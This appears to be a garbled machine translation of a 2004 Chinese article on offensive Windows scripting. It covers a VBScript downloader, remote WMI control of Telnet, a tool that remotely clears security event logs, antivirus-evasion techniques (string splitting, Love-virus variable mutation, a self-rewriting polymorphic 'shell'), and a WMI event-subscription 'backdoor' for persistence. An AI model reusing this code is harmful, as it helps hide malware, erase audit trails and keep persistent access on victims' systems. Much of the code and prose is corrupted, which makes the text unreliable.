Dig Windows Script writer: Unknown Article Source: Unknown Nature article: Original Views: 11 Date: 2004-11-19 dig Windows Script ---------------- --------------------------------------- zzzevazzz
CODZ: IF (Lcase (WScript.Fullname, 11)) = "wscript.exe") Then 'judgment the name of the script host' DIE ("Script host must be cscript.exe.") 'Script host is not CScript, so On the DIE 'end if if wscript.Arguments.count <1 TEN' must have a parameter 'Die ("Usage: cscript webdl.vbs url [filename]")' sparrow is small, usage can't forget 'end if URL = WScript.Arguments (0) 'The parameter array subscript starts' IF url = "" "" URL CAN't Be Null. ")' Dare (" URL CAN't Be Null. ") 'Dare me, empty URL can not do' if wscript.Arguments. Count> 1 Then 'first judges whether the number of parameters is greater than 1' filename = wscript.Arguments (1) 'Re-access the second parameter' else 'If the file name is not given, it is obtained from the URL' t = INSTRREV (URL "/") 'Get the last "/" position' IF t = 0 or T = LEN (URL) THEN DIE ("Can not get filename to save.") 'No "/" or "/" 'Filename = Right (URL, LEN (URL) -t)' Gets the file name to be saved 'end ifick, 7) = "http: //" THEN URL = "http: //" & url 'If you carefully put "http://", add' set fso = wscript.createObject ("scripting.filesystemObject") 'FSO, ASO, HTTP three objects one Ca n'ter 'SET ASO = WScript.createObject ("AdoDb.Stream") set http = wscript.createObject ("Microsoft.xmlhttp") if fso.fileexists (filename) Then' determines if the file to download is already 'start = fso .geetfile (filename) .size '
Presented, with the current file size as the start position 'else start = 0' does not exist, everything starts from zero 'fso.createtextFile (filename) .close' New file 'end if wscript.stdout.write "connection ..."' The play is just beginning 'current = start' The current position is the start position 'do http.open "get", URL, TRUE' here call http 'http.setrequestHeader "Range", "Bytes =" & Start & "-" & CSTR START 20480) 'The mystery of the breakpoint is here' http.setrequestheader "Content-Type:", "Application / Oct-stream" http.send 'constructs the packet starts to send' for i = 1 to 120 'Cycle Waiting for' if http.readyState = 3 THOWPLAN () "State 3 Indicates that the data is started, the display progress' if http.readyState = 4 THEN EXIT for 'Status 4 indicates that the data accepts the complete' WScript.sleep 500 'Waiting 500ms' Next if not http.readyState = 4 THEN DIE ("Timeout.") '1 minute has not finished 20K? time out! 'IF http.status> 299 Then Die ("Error:" & http.status & "& http.statustext)' No, and wrong? 'If not http.status = 206 The Die ("Server NOT Support Partial Content.")' Server does not support breakpoints' ASO.TYPE = 1 'data stream type Set to byte' aso.open aso.lyfromfile filename 'Open file' aso.position =
Start 'Settings File Pointer Initial Location' aso.write http.responsebody 'Write Data' ASO.SAVETOFILE FILENAME, 2 'Overwrite Save' aso.close Range = http.getResponseHeader ("Content-Range") Get http headers "Content-Range" 'if Range = "" "" Can not get range. ")' No, don't know if there is no 'Temp = MID (Range, Instr (Range," - ") 1)' Content-Range is similar to 123-456 / 789 'current = clng (Left (Temp, INSTR ("/") - 1))' 123 is the start position, 456 is the end position 'Total = CLNG (MID) Temp, INSTR (TEMP, "/") 1)) '789 is the total number of files' IF total-current = 1 THEN EXIT DO 'End position is less than the total size 1 indicates that the transfer is complete,' start = start 20480 'Otherwise download 20K' loop while true wscript.echo chr (13) & "DOWNLOAD (" & TOTAL & ") DONE." 'Download, display the total byte' function Die (MSG) 'function name from the Perl built-in function Die 'wscript.echo msg 'Connect the words ^ _ ^' wscript.quit 'Go to see Marx' end function funplan () display download progress' if i mod 3 = 0 THEN C = "/" 'simple dynamic effect' if i mod 3 = 1 THEN C = "-" IF i mod 3 = 2 THEN C = "/" WScript.stdout.write chr (13) & "Download (" & Current & ")" & C & CHR (8) '
The No. 13 ASCII code is back to the leader. No. 8 is backlighted 'end function can be seen that the HTTP control function is very powerful. By operation of the HTTP header, it is easy to achieve breakpoints. In the example, it is just a single thread, in fact, because the HTTP control supports asynchronous calls and events, you can also implement multi-threaded downloads. There is a detailed usage in MSDN. As for the details of the breakpoint, please see RFC2616. FSO and ASO can access files, what is the difference? In fact, ASO does not except for access to byte (non-text) data, there is no need to exist. If you want to implement the ASO in the example with FSO, it will be wrong when you write http.responsebody. Violation, ASO cannot determine if the file is present. If the file does not exist, LoadFromFile is a chance to correct and do not correct. Of course, you can use the ON Error Resume next statement to let the script host ignore non-fatal errors, capture and process themselves. But there are ready-made fileexists () why not? In addition, since FSO is often used by script viruses and ASP Trojans, the administrator may modify the information of the control in the registry to make the script unable to create FSO. In fact, an order regr32 / s scrrun.dll is restored. Even if Scrrun.dll is deleted, you will copy it in the past. After the warming up, let's take a powerful object - WBEM (provided by WMI). [WMI Service] First look at how the MSDN describes WMI -Windows Management Specification (WMI) is a scalable system management structure, which uses a unified, standard, scalable object-oriented interface. When I was just understanding WMI, I always thought that WMI is "Windows Management Interface" (Interface), huh, huh. Look at what WMI service - provides a common interface and object model to access management information about operating systems, devices, applications, and services. If this service is terminated, most Windows-based software will not function properly. If this service is disabled, any service that relies on its service will not be able to start. It seems to be a very important service. However, by default, there is no service to rely on it, but it is to rely on RPC and EventLog services. But it is often used. I set the WMI service to start and stop, using the computer for a while, I found that the WMI service was started again. It is necessary to start, which is the characteristic of the service set to "manual". When I know how much the management information provided by WMI is, I don't feel strange to the Self-starting of WMI services. I want to understand the complexity of WMI, you can use Wmitows.exe [2]. This is a tool set. Use WMI Object Browser to see many WMI-provided objects, which are not complex. More importantly, WMI also provides dynamic information, such as current processes, services, users, etc. The logical structure of WMI is this: first is WMI user, such as script (exactly script host) and other applications that use the WMI interface. The WMI user accesses the CIM object manager Winmgmt (ie WMI service), the latter re-accesses the CIM (Public Information Model CommON Information Model) Repository. Static or dynamic information (objects of the object) is saved in the CIM library while still having an object. Some operations, such as starting a service, implementing the object. This is actually called various DLLs through COM technology. Finally, the request is completed by the API packaged in the DLL.
WMI is an event-driven, operating system, service, application, device driver, etc. can be used as an event source, and event notifications are generated via COM interface. Winmgmt captures events and then refreshes dynamic information in the CIM library. This is why WMI services rely on EventLog. After the concept, let's take a look at how to operate the WMI interface. The code below is from the script RTCs I write. It is a script that remotely configures Telnet service. Here, only the key parts: The first is to create an object and connect to the server: Codz: set objlocator = createobject ( "wbemscripting.swbemlocator") set objswbemservices = objlocator.connectserver (ipaddress, "root / default", username, password) first Create a service location object, then the second sentence connects the server with the ConnectServer method of the object. In addition to the IP address, user name, password, there is also a namespace parameter root / default. Just like the registry has a root key, the CIM library is also classified. Use the object-oriented term to be described as "name space" (Name Space). Since RTCs should process NTLM authentication methods and Telnet service ports, they need to access the registry. Operating the object of the registry in root / default. Codz: set objinstance = objswbemservices.get ( "stdregprov") 'StdRegProv instantiated objects' set objmethod = objinstance.methods _ ( "SetDWORDvalue")' SetDWORDvalue method also an object itself 'set objinparam = objmethod.inparameters.spawninstance_ ()' instantiate Enter the parameter object 'objinparam.hdefkey = & h80000002' root directory is HKLM, code 80000002 (16) 'objinparam.ssubkeyName = "Software / Microsoft / Telnet Server.0" Set Sub button' objinparam.svaluename = "ntlm" setting Key value name 'objinparam.uValue = ntlm' Set key value content, NTLM is a variable, determined by the user input parameters' set objoutparam = objinstance.execmethod _ ("setdwordValue", ObjinParam.SValueename = "TelnetPort" ObjinParam.uValue = port 'port is also the parameter entered by the user' set objoutparam = objinstance.execmethod _ ("setdwordValue", objinaram) See this here? It is also a name space and is an instantiation of the class. I feel very uncomfortable when I just started learning WMI. I remember that my junior high school teacher said, reading must first read the book, and then read the book. It is because of the joining his own ideas, reading is because it is to grasp it. Let's read books now.
The above code can be changed to: CODZ: set olct = creteObject ("wbemscripting.swbemlocator") set oreg = olct.connectServer (IP, "root / default", user, pass) .get ("stdregprov") hklm = & h80000002 OUT = Oreg.SetdWordValue (HKLM, "Software / Microsoft / Telnet Server.0", "NTLM", NTLM) OUT = Oreg.SetdWordValue (HKLM, "Software / Microsoft / Telnet Server.0", "Telnetport", Port) is now What is more simple? Next, it is control over the Telnet service state. Codz: set objswbemservices = objlocator.connectserver (ipaddress, "root / cimv2", username, password) set colinstances = objswbemservices.execquery ( "select * from win32_service where name = 'tlntsvr'") for this connection is root / cimv2 name space. Then use WQL (SQL for WMI) to search for TLNTSVR services. I know what I am doing when I am familiar with SQL syntax. This is a set of Win32_service instances, although the WHERE statement determines that the group always has only one member. For simplicity, suppose as long as the service status is switched. Codz: for each objinstance in colinstances if objinstance.started = true then 'depending on whether the service has been launched to determine the properties started' intstatus = objinstance.stopservice () 'is to call stopservice stop service' else intstatus = objinstance.startservice () 'No, Calling the StartService Start Service 'end if next key code is these, the rest is the code that handles input and fault tolerance. Summarize the process: 1. Connect the server and the appropriate namespace. 2. A or a set of instances of the required object with the GET or EXECQUERY method. 3, read and write the properties of the object, call the method of the object. So, how do you know which name space to connect, what objects get? The Classification of the WMI Technical Guide [3] lists a large number of commonly used objects. Unfortunately, it has no corresponding e-book, you only go to the bookstore to find it. You can also use the WMITools for the WMI CIM Studio search function, it is easy to find the desired object. After finding an object, WMI CIM Studio lists its properties and methods, then find specific help in MSDN. Application examples, in addition to the 7 RS series scripts I wrote, there are also reference materials [4].
In particular, in Reference [4], the connection server and name space are similar to the following syntax: CODZ: set objwmiservice = getObject ("WinMgmts:! /" & StrComputer & "/ root / cimv2: win32_process") The detailed syntax is introduced in the "WMI Technical Guide" and MSDN, but we don't care about it, because this method does not have username and password parameters. Therefore, only if the current user can be used in the target system (including local). If ConnectServer is used locally, the first parameter can be 127.0.0.1 or a point ".", The 3rd, 4 parameters are empty strings "" ". Finally, there is still a "privilege" issue for WMI. If you have seen the ROTS code, you will find two "strange" statements: CODZ: objswbemservices.security_.privileges.add 23, true objswbemservices.security_.privileges.add 18, true This is to apply to WMI service application permission . 18 and 23 are all authority code. Some important codes are listed below: 5 Creating an account in the domain 7 Managing audits and views, saves and cleaning security logs 9 loading and unloading device driver 10 Recording system time 11 Change system time 18 Local shutdown 22 Winding past passing 23 Allow remote shutdown details, please also look at the "WMI Technical Guide" or MSDN. All privileges are not available. When I wrote RCAS, because I forgot to apply for privileges 11, the result has been tested failure, and I only found the reason for a long time. As long as there is permission to connect to the WMI service, you can always apply for privileges. This privilege mechanism is just to constrain the behavior of the application, and the system stability is enhanced. It is a bit strange that accessing the registry does not have to apply for any privilege. I really don't know what Microsoft's developers think it may be that the access registration is too common. [Script also has GUI] Although the system provides WScript and CScript two scripts, the script is responsible for the window environment and the script in the command line environment, but in fact, the user and script interaction in the window environment are not very convenient: parameter input can only establish fast The InputBox dialog box will pop up the InputBox dialog, and only after the user is "determined" after the user is "OK". There is no intuitive and fast advantage in the window environment. Fortunately, there is an InternetExplorer object, the script can provide a Web style GUI.
Or come to see an example, a script for clearing the system log, follow the WMI: CODZ: SET IE = WScript.createObject ("InternetExplorer.Application", "Event_") 'Create IE object' ie.menubar = 0 'Cancel menu Bar 'ie.addressbar = 0' Cancel Address Bar 'IE.Toolbar = 0' Cancel Tool Bar 'IE.Statusbar = 0' Cancel Status Bar 'IE.Width = 400' Width 400 'IE.Height = 400' High 400 ' IE.Resizable = 0 'does not allow users to change window size' ie.navigate "about" & ": blank" Open blank page 'IE.LEFT = FIX ((ie.document.parentwindow.screen.availwidth-IE.Width) / 2) 'horizontal home' IE.top = FIX ((ie.document.parentwindow.screen.availheight-ie.height) / 2) 'vertical home' ie.visible = 1 'window visible' with IE.DOCU Ment 'The following is called Document.Write method,' .write "
" write a section of the HTML to the IE window. '.write "Target IP: " can also use Navigate Open a '.write "
Username: "' an HTML file, the effect is the same.
'.write "
password: " .write "
Type:"' Not only INPUT object, all DHTML support '.write " Applications' objects and their properties, the method can be used. '.write " < BR> "'The object within the frame is similar. '.write "" .write "" .write " " End with Dim WMI " Explicitly defined a global variable 'set wnd = ie.document.parentWindow' Settings WND for window object 'set id = i.document.all' Sets the collection of all objects in Document 'id.confirm.οclick = GetRef (" CONFIRM ") 'Set the process function when you click" OK "button' id.cancel.οnclick = getRef (" Cancel ") Set the handler" Cancel "button to the" Cancel "button 'Do While True' Since the IE object supports events, Correspondingly, 'WScript.sleep 200' scripts waits for a variety of events in an infinite loop. 'loop subnend_onquit' IE Exit Event Process' WScript.quit 'When Ie exits, the script also exits' End Sub Sub Cancel' "Cancel" Event Process' IE.quit 'Call IE Quit Method, Turn the IE Window' End sub 'then triggers Event_onquit, so the script also exits the' Sub Confirm '"OK" event process, which is the key' with id if .ip.value = "" "" "" "ip.value =". 'empty IP The value is default to the local operation 'if not (.app.checked or.sys.che "app, etc. is Checkbox, by detecting its checked' wnd.alert (" at least one log " ) 'Attribute, to determine if it is selected. 'Exit sub end if set LCT = CreateObject ("Wbemscripting.swbemlocator")' Creating Server Location Object 'on Error ResMe next' makes script host ignore unsatisfied error 'set wmi = lct.connectServer (.ip.value, "root / CIMV2 ",. user.value, .pass.value) 'Connect to root / cimv2 name space' if err.number dam to capture errors and handle 'Wnd.alert (" Connect WMI Server Failure ")' This is just simple Display "failed" 'err.clear on error goto 0' still processes all script hosts "EXIT SUB End if if .app.checked dam" Application "'Clear each selected log' if.s.checked the Clearlog "system" if .sec.checked killick "security" 'Note * from win32_nteventlogfile where logfilename = '"& name") Note 'But specify the file object of the log. 'If l.cleareventlog () THEN WND.Alert ("Clear Log" & Name & "Error!") IE.quit WScript.quit End If Next End Sub summed up the entire process. The first is to create an InternetExplorer.Application object. Its direct effect is to start an Iexplorer process, but the window is invisible until IE.visible = 1 is set. The HTML statement is then written to the IE window with the Document.Write method. For complex interfaces, the HTML code can be saved as an HTML file, open with IE.NAVIGATE (FileName). Finally, it is the input in the response window. This is basically a scope of knowledge of DHTML. The most different from the general script programming is that IE is an event-driven. What you have to do is setting the corresponding event handler / process. In this example, the script only cares about 3 events: IE exits, "OK" button is clicked, "Cancel" button is clicked. Note that there is only two statements that set the event handling process in the example, and no IE exit event is associated with the Event_ONQUIT process. This is because here uses a feature - the second parameter "event_" when creating an IE object is a prefix, and the Event Process of the IE object is the prefixed event name. So the process of the ONQUIT event is due to Event_ONQUIT. When the "OK" button is clicked, the confirm process is called. The example demonstrates how to access objects in IE, such as IE.Document.all.ip.Value is the input in the Target IP text box. If "Application" this checkbox, IE.Document.all.App.checked is true, otherwise false. To call the Alert method, use IE.Document.parentWindow.alert. The access methods of other IE objects are totally similar. Specifically, you can see DHTML related information. With the web interface, interaction becomes rich and colorful. Everyone can give full play to creativity. For example, many GUI tools (such as streaming) are started, there is a logo page, display copyright information. We can also simulate one out: CODZ: set IE = wscript.createObject ("InternetExplorer.Application") ie.fullscreen = 1 IE.Width = 300 ie.Height = 150 IE.NAVIGATE "About" & ": Blank "IE.LEFT = FIX ((ie.document.parentwindow.screen.availwidth-ie.width) / 2) IE.top = FIX ((ie.document.parentwindow.screen.availheight-ie.height) / 2) IE .document.write "
" & _ " this is a Logo " ie.visible = 1 wscript.sleep 5000 IE.quit This code is executed, and a set of IE windows without the title bar and border will be displayed in the center of the screen for 5 seconds. The window is a black word of the blue bottom. This is a logo. After the script GUI, the interaction with the user is more intuitive. Tools with many parameters like NMAP, when used locally, "Interface" that writes a graphical interface is eternal. The result of the output can also be processed with script to display, which is displayed in a way that can generate an HTML scan report like a tool such as stream light. [Inspected killing] must first explain that I have not tried to challenge the anti-virus software anti-virus capabilities. The Windows script is an explanatory language, a clear text saves code. Since there is no compilation process, the complexity of the code is far less than the executable program (EXE). Don't do anything else, there is no reason to count on the script. However, it is because the inspection of the script is very poor, so that the killing method used by anti-virus software is not advanced. So we organically multiply. Let's take a look at the common anti-check method: 1, split / reorganization of strings or statements.
The most typical example is to turn FSO = CreateObject ("scripting.filesystemObject") to fso = createObject ("script" "ING.FILESYSTE" "MOBJECT") Extension Extension is to use Execute statement: Execute ("FSO = CREA " " teobject ("" SCR " " ipting.filesy " " STEMOBJECT "" ") 2, the variable name is automatically changed. CODZ: Randomize Set of = CreateObject ("scripting.filesystemObject") VC = Of.OpenTextFile (wscript.scriptfullname, 1) .readall fs = array ("of", "vc", "fs", "fsc") for FSC = 0 TO 3 VC = Replace (VC, FS (FSC), CHR (INT * 22) 65) & chr ((IND * 22) 65) & chr ((INT * 22) 65)) & chr ((int (RND * 22) 65))) Next Of.OpenTextFile (WScript.ScriptfullName, 2, 1). The code above this code is taken from the love virus, everyone runs I know what is going on. 3, use the official tool - script encoder Screnc.exe [5] encrypted script. The encrypted script can be directly explained by the script host. This is the best solution, but "guns and birds", because encryption is reversible, all anti-virus software has decoding function. Therefore, the effect of this approach is basically zero. The first method is effectively telling us that this fact: the killing of the script virus is basically static. Moreover, I found that even if it is only changed, it can also play an anti-check (only a anti-virus software). The key to the reverse investigation is to reduce the signature. For the anti-check killing of EXE, it is easier to think about "housing". This approach can also be applied on the script. For example: CODZ: str = "cswpire.tohco" "" ""! K "for i = 1 to Len (str) Step 3 Rev = Rev Strreverse (MID (STR, I, 3)) Next Execute Rev is the simplest "shell". The algorithm of "shell" is the order of reverse per n character. n is the "seed" of the algorithm. In this example it is equal to 3. This "shell" is dead and does not reducing the effect of the signature. Instead, the signature is added, such as "CSWPire".
Look at a complex example: CODZ: str = "wscript.echo" "ok!": RDomize: key = int (RND * 8 2): str = Re: str = Replace (STR, CHR (34) CHR (34) CHR (34)): set aso = creteObject ("adoDb.stream"): with aso: .Open: .writetext "Str =" chr (34) STR CHR ( 34) "": key = " cstr (key)" ": str = rev: Execute str: function rev (): for i = 1 to len (str) Step key: Rev = Rev strreverse (MID (STR, I, Key): Next: End Function "":. Savetofile wscript.scriptfullname, 2: end with ": key = 1: str = rev: Execute str: function rev (): for i = 1 to Len (STR) Step Key: Rev = Rev Strreverse (MID (STR, I, Key): Next: End Function (Note Like a code, pop up a dialog box displays "OK!". However, after the execution is followed, it may become like this: CODZ: str = "tpircsw" "ohce.ar:""! Koezimodnni=yek:8*dnr (TRTS :)2 ts:Ver=alper=R RTS (EC) 43 (RHC43 (RHC, 3 (RHC ) TES :)) 4RC = OSA Jboetaeda "" (Tcerts.bdow :) "" Maeosa HTI: nepo.: tetirw.ts "" TXERHC "= RTS ) 43 (3 (RHC Rek: "" ) 4TSC "= Y ) Yek (rr = rts:" "CEXE: VERTS ETUITCNUF: (Ver noi rof:) L OT 1 =) RTS (nek pets = ver: Yerts VERESREVERTS (DIM (Yek, I, RTXEN :)) UF DNE: "NOITCNTEVAS.:W Elifo.tpircsftPircSemanllu DNE: 2, HTIW": key = 7: str = Rev: Execute str: function rev (): for i = 1 to Len (STR) Step Key: Rev = Rev Strreverse (MID (STR, I, Key): Next: End function is executed again. This script is self-deformed. If you look closely The code will find that "shell" algorithm is still, and "seed" is randomly changed. However, the contents of the shell is different, "shell" itself still has no change. Many EXE hand-in-shells, shells, itself The character code is extracted as malicious code.
In order to better inspector, the "shell" of the script also needs to be dynamically changed. This is to use so-called polymorphism. However, EXE's polymorphism is used to counter-motion, and the "polymorphism" of the script is only payable, and the two are very different. For EXE, the real polymorphism has not yet been heard. How much is the script that can only do. Do not affect the modification of the function, in addition to the three mentioned above,: 1, random change case; 2, colon (:) is randomly interchanged with the carriage return (except the colon after the character string and "THEN" 3, " " and "&" randomly interchanged; 4, () - * / &, and other characters to add spaces or renewal (_) and the combination of Enter; 5, replace the built-in function with custom functions; even if the custom function is just a simple package built-in function, at least the keyword is changed. .......... There are other "polymorphism" algorithms to be studied. The application of these algorithms is premised on a large increase in code length. If you want to write a relatively perfect "shell", I believe that I will involve the knowledge of "Grammar Analysis", because the script should "read" itself, thus achieving the effect similar to the Java obfuscator, this is very complicated, there is a chance to be again Everyone discussed.
Let's applying "Statement Split", "Variable Name Automatic Change", "Random Size", " and & Interchange", look at the effect: CODZ: A001 = "wscript.echo" "OK!" ": A004 = CHR (34): Randomize: A005 = INT (RND * 24000 40960): A001 = A006 (A001): A000 = A005 MOD 10 2: A001 = Replace (A002, A004, A004 & A004): SET A007 = CreateObject ("AdoDb.Stream"): A007.Open: A007.Writetext HEX (A005 1) & "=" "& A004 & A001 & A004 & A008 (":: "& A004 & A006 (" A000 = "& A000 &" " : A001 = A002: Execute A001: Function A002 (): for A003 = 1 to LEN (A001) Step A000: A002 = A002 STREVERSE (MID (A001, A003, A000)): Next: End function "") & A004) : A007.savetofile wscript.scriptfullname, 2: Function A006 (A009): For A00A = 0 to 12: A009 = Replace (A009, HEX (& HA000 A00A), HEX (A005 A00A)): Next: A006 = A009: END FUNCTION: FUNCTION A008 (A009): for A00A = 1 To LEN (A009): A00B = MID (A009, A00A, 1): IF INT (RND * 2-1) THEN A00B = UCase (A00B): END IF: IF A00A> 11 and INT (RND * 5) = 0 THEN A008 = A008 & A004 & CHR (38 INT * 2) * 5) & A004: END IF: A008 = A008 & A00B: NEXT: END FUNCTION: A000 = 1: A001 = A002: Execute A001: Function A002 (): for A003 = 1 To Len (A001) Step A000: A002 = A002 STRREVERSE (MID (A001, A003, A000): Next: End function (Note, where there is no carriage return) is "original", saved as a VBS file double-click to run, or pops up the dialog box displays "OK!".
I look at the code variation (the effect is random): CODZ: B906 = "TPIRCSW" "OHCE.9B:" "! KO (RHC = 90nar:) 43: EzimodNi = A09b2 * DNR (T04 00049b :) 069B09B = 60: 609B (9B = 509B DOM A09B: 2 01Lper = 6009B (ECA, 909B, 79B & 909Btes:) 90c = c09b Boetaera "" (Tcejts.bdod :) "" MaerPo.c09bc09b: NetTirw.xeh TXE1 A09B (B & "=" "&" = "" "(d09betucexe909b &" "" "" "" "(b09b &&" = 509b: "& 509b9b = 609bcexe: 709b etcnuf: 609b NOITOF:) (70 = 809B REL OT 1) 609B (NB PETS 09B: 509 709B = 7everrtsdim (ESRB, 609B (09B, 809X :)) 5F DNE: TNOITCNU909B &) "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" " 21Calper =, E09B (EBH & (XEH09B 509 (XEH,) F9B A09BEN :)) F0B09B: TXE: E09B = CNUF DNUF: NOIT NOITCN9B (D09Brof:) E01 = F09B Nel OT:) E09B (IM = 019b, E09B D) 1, F09BTNI FI: -2 * DNR (NEHT) 1U = 019b 9b (esacdne:) 01 FI: FI 11> F09BNI DNA 5 * DNR (TEHT 0 =) = D09B N9B & D09B (RHC & 90 (TNI 83 *) 2 * DNR909B & 5FI DNE: B = D09B: 19B & D09: TXEN: 0NUF DNENOITC ": Execute" B9 "&" 05 = 7 "&": b906 "&" = b907: e " " XEC " " ute b906 " ": Fun" & "CTION B9" & "07 (): for" "B9" "08 = 1 to L" & "en (b906)" "Step B905: B907" & "= B907 " & " Strreverse (MID) "&" B9 "&" 0 "&") " "): n " " EX " " t " ": End Fun "&" CTION "is not? Cooking again: CODZ: f0cb = "rcsw.tpiohceko" "f:" "! =
EC0 (RHC:) 43DNARZIMO0F: EI = FCR (TN2 * DN0004904 :) 06bc0fd0f = 0f (0:) BCAC0FC0F = om F01 DF: 2 = Bc0Lper (ECACC0FC0F, 0F, EF & EC) EC0tes: D0F RC = 1Taeejbo "(Tcdodats" .Bmaerf :) "" "1D0NEPOD0F: RW.1TTI TXE (XEHFC0F &) 1 &" = "" EC0FC0F & 0F & BF & EC (2D0XE: "" Tuce & "" EEC0FD0F & F "" (0 = AC00F & "" "& AcC0f: 0f = be: CCUCEX ETBC0FNUF: OITC0F N) (Ccrof: C0F 1 = DL OTF (NE) BC0ETS 0F PF: AC = CC0CC0FRTS EVER (ESR (DIMBC0FC0F, 0F, D)) ACXEN: NE: TUF DITCN "" NOC0F & f:) e. 1D0evasifotw elircss.tppircluftmanl: 2, ecnufnoitD0F 0F (0:) 3D rof4D0Ft 0 = 21 oD0F: er = 3calp0F (eh, 3D & (xeC0FH0F A,) 4D (xehFC0FD0F :)) 4txenD0F: 0F = 0e: 3Df dntcnu: noicnufnoitD0F 0F (2:) 3D ROF4D0FT 1 = EL O0F (N:) 3D5D0FDIM = D0F (0F, 31, 4DFI:) TNI DNR (1-2 * HT) F NE = 5d0SAcu0f (E:) 5D DNEI: FI0F F1> 4DNA 1Ni DNR (T) 5 * DT 0 = neH2D0FD0F = 0F & 2C & EC3 (RHNI 8nR (T) 2 * D &) 5 * Ec0fdne :: Fi 2D0FD0F = 0f & 2N: 5D: TXE DNECNUFNOIT ": Execute" f " " 0CA "&" = = 4: F0CB " " = " " F0CC: EX " " E " " CUTE F0CB "&": F " " UNC " " Tion F0cc (): f " " OR " " F0 "& "CD = 1 to LEN (F0CB) Step F0CA: F0CC = F0CC STRR" "Ever" "SE" & "(MID (" "F0CB," "F0CD, F0CA)): Next: End fu & "nctio" & "n"? ? --do not know. Perhaps the anti-virus engine is ignored by ignoring, and it can be automatically connected to the string. It can be "textual analysis" ... Is this "shell" practical? --No. Because the algorithm of "shell" is too simple. "Seed" A000 = A005 MOD 10 2, so if the automatic change variable name is not considered, only 10 of the shells have only 10 kinds of code. How to improve this "shell"? - Of course, more complex algorithms, more "polymorphism".
If you are interested, you can look at the "original" script code (replace the colon as a carriage return, readability is better), then strengthen it. Of course, you can also stove, free to show your creativity. [To do a back door] In front of the script, you need to introduce a very useful WMI object. In fact, this is the key to this section. The script back door is just an application. As mentioned earlier, WMI is an event-driven. The entire event handling mechanism is divided into four parts: 1. Event producers: Responsible for events. WMI contains a lot of event producers. Specific event producers in performance counters, also have universal event producers such as category, creating, modification, deletion, and other universal events. 2, Event Filter: The system generates a large number of events all times, and scripts can capture the events of interest by custom filters. 3. Event Consumers: Responsible for handling events. It can be an executable program, a dynamic link library (DLL, loaded by WMI) or script. 4, Event Binding: By binding the filter and consumer, clear what consumers are responsible for processing. Event consumers can be divided into temporary and permanent. Temporary event consumers only care about specific events during their operations. Permanent consumers as an instance of the class registration in the WMI name space, which has always been valid until it is canceled. Obviously, permanent event consumers are more practical.
Or come to see example: CODZ: nslink = "WinMgmts: /./ root / cimv2:" only requires local connection, so use this grammar, no Swbemlocator object 'set accet = getObject (NSLink & "ActivescripteVentconSumer). SpawnInstance_' Create "Activity Script Event Consumers" 'asec.name = "stopped_spooler_restart_consumer"' Defines the name of the consumer 'acrtiPtinGine = "vbscript" Defining a scripting language (only vbscript)' acipttext = "getObject (" "" winmgmts: win32_service = 'spooler' "".) startservice " 'script code' set asecpath = asec.put_ 'registered consumers to return their links' set evtflt = getobject (nslink &" __ EventFilter ") spawninstance_ 'Creating an event filter'. evtflt.name = "stopped_spooler_filter" 'define the filter name' qstr = "select * from __instancemodificationevent within 5" 'once every 5 seconds query "example Change event"' qstr = qstr & "where targetinstance isa" "win32_service" "and" The class of the 'target instance is Win32_service' qstr = QStr & "TargetInstance.name =" "" "" "" "instance name is spooler 'qstr = QSTR &" AND targetinstance.state = "" "" "" "" "" "" "" "" "" The state attribute is stopped 'evtflt.query = qstr 'Defined query' evtflt.querylanguage = "wql" 'definition of query language (only wql)' set fltpath = evtflt.put_ 'registered filters, return to their links' set fcbnd = getobject (nslink & "__ FilterToConsumerBinding"). Spawninstance_ 'Creating a filter and consumer's bind' fcbnd.consumer =
Asecpath.path 'Specifies consumers' fcbnd.filter = fltpath.path 'Specify filter' fcbnd.put_ 'Performing Bind' WScript.echo "Installation" This script is: When "Spooler) When the state changes to stop, the consumer will process - restart the spooler. First Net Start Spooler, then Net Stop Spooler. For up to 5 seconds, Spooler will start again. The script directly running will be wrong because "ActivescriptEventConSumer Asec) is not installed to the root / cimv2 name space by default. Use Notepad to open% windir% / system32 / wbem / scrcons.mof, delete the first line "#pragma namespace (" //./root/default ")" "//." #Pragma namespace ("//. / Root / cimv2 ")". XP / 2003 does not have this line without modification. Then do this: C: / Winnt / System32 / WBEM> Mofcomp.exe -n: root / cimv2 scrcons.mof Microsoft (R) 32-bit MOF Structure version 1.50.1085.0007 Copyright (C) Microsoft Corp. 1997 -1999. all rights reserved. Analysis MOF file: Scrcons.Mof MOF file analysis successfully stored data into the reserve library ... Completed! This is installed to Root / Cimv2. Mofcomp.exe and Scrcons.mof are all self-contained. 2000 The default is installed to the root / default name space, while XP / 2003 has been installed to the root / subscription name space, but due to the event filter, the event filter cannot be captured (XP / 2003 can be), the event binding cannot be across Namespace, and most events are generated in root / CIMv2, so you need to reinstall the namespaces where the ASEC to the event source is. Below this script automatically completes ASEC to re-install tasks.
Codz: set shl = createobject ( "WScript.Shell") set fso = createobject ( "Scripting.FileSystemObject") path = shl.expandenvironmentstrings ( "% windir% / system32 / wbem") set mof = fso.opentextfile (path & "/ Scrcons.mof ", 1, false, -1) 'MOF is a unicode format' MOFS = MOF.READALL MOF.CLOSE MOFS = Replace (MOFS," / Default "," / CIMv2 ", 1, 1) 'Replacement Default namespace 'mofp = path & "/ spacecimv2.mof" set mof = fso.createtetextfile (mofp, false, true)' Create a temporary MOF file 'MOF.WRITE MOFS MOF.CLOSE SHL.RUN PATH & "/ Mofcomp.exe - N: root / cimv2 "& mofp, 0, true" Installing Root / Cimv2 'fso.deletefile (MOFP) WScript.echo "Installation Complete" logout permanent event: CODZ: NSLINK = "Winmgmts: /./ root / CIMV2:" myconsumer = "stopped_spooler_restart_consumer" 'specified consumer name' myfilter = "stopped_spooler_filter" 'specify the name of the filter' set binds = getobject (nslink & "__ FilterToConsumerBinding"). instances_ for each bind in binds if strcomp (right (bind.consumer, Len (MyConsumer) 1), Myconsumer & Chr (34), 1) = 0_ and strcomp (Right (Bind.Filter, Len (MyFilter) 1), MyFilter & Chr (34), 1) = 0 the n getObject ("WinMgmts:" & bind.consumer). deleted consumer 'getObject ("WINMGMTS:" & BIND.FILTER). Delete_' Delete Filter 'bind.delete_' Delete Bind 'exit for end if next wscript. Echo "Uninstall" In addition to ASEC, WMI also provides other permanent event consumers, such as SMTPEVENTCONSUMER. When the system appears anomaly, you can automatically send a letter to the administrator's mailbox. Wmitools WMI Event Registration is used to create, modify, delete instances of permanent event consumers, event filters, and timer event sources in the specified namespace, and bind or release them.
